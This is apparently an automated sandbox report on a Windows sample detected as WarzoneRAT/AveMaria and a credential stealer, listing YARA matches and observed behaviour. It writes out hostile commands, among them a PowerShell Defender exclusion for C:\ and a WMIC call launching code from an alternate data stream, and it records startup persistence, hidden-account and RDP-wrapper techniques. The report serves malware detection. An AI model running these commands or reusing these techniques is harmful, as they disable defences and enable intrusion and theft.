Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM | author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT | author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: String function: 00407FC0 appears 33 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: String function: 02D20969 appears 47 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: String function: 02D135E5 appears 40 times
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000000.242916125.0000000000554000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Binary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File created: C:\Users\user\AppData\Local\Microsoft Vision\
          Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winEXE@18/18@0/1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1D49C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_02D1D49C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00406750 LoadResource,LockResource,SizeofResource,0_2_00406750
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File created: C:\Program Files\Microsoft DN1
          Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | ReversingLabs: Detection: 24%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
          Source: C:\ProgramData\images.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
          Source: C:\ProgramData\images.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'
          Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1F619 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_02D1F619
          Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_caqnsxdv.wy2.ps1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D2290F CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,0_2_02D2290F
          Source: C:\ProgramData\images.exe | Code function: 4_3_02F494E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,4_3_02F494E0
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D220B8 RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_02D220B8
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6376:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
          Source: C:\ProgramData\images.exe | File written: C:\Program Files\Microsoft DN1\rdpwrap.ini
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\ProgramData\images.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Directory created: C:\Program Files\Microsoft DN1
          Source: C:\ProgramData\images.exe | Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll
          Source: C:\ProgramData\images.exe | Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuser32.pdb source: images.exe, images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wuser32.pdbUGP source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00408010 push ecx; ret 0_2_00408023
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0041C352 pushad ; retf 0_2_0041C359
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0041D355 push esi; ret 0_2_0041D35E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0041C33A push esp; retf 0_2_0041C351
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D11190 push eax; ret 0_2_02D111A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D11190 push eax; ret 0_2_02D111CC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00553B50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00553B50
          Source: initial sample | Static PE information: section name: UPX0
          Source: initial sample | Static PE information: section name: UPX1

          Persistence and Installation Behavior

          Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1D418 NetUserAdd,NetLocalGroupAddMembers,0_2_02D1D418
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File created: C:\ProgramData\images.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File created: C:\ProgramData:ApplicationData
          Source: C:\ProgramData\images.exe | File created: C:\Program Files\Microsoft DN1\sqlmap.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D127D3 URLDownloadToFileW,ShellExecuteW,0_2_02D127D3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1A6C8 GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,0_2_02D1A6C8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1AC0A lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,0_2_02D1AC0A

          Boot Survival

          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start
          Source: C:\ProgramData\images.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters
          Source: C:\Windows\System32\drivers\tsusbhub.sys | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1D508 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_02D1D508

          Hooking and other Techniques for Hiding and Protection

          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
